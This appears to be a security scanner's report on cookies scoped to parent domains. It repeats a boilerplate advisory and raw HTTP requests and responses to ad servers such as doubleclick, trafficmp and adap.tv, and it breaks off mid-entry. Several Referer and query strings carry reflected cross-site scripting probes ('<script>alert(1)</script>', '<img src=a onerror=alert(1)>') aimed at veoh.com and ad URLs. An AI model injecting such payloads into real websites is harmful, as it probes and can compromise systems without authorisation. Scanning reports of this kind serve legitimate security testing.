The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Sports/wireStory HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Fri, 04 Feb 2011 02:29:40 GMT
Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Found
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 04 Feb 2011 02:29:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://s0.2mdn.net/viewad/2850237/1x1.gif
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23661 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beacons?callback=jsonp1296766389465 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"
Response
HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1376
Server: Jetty(6.1.22)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
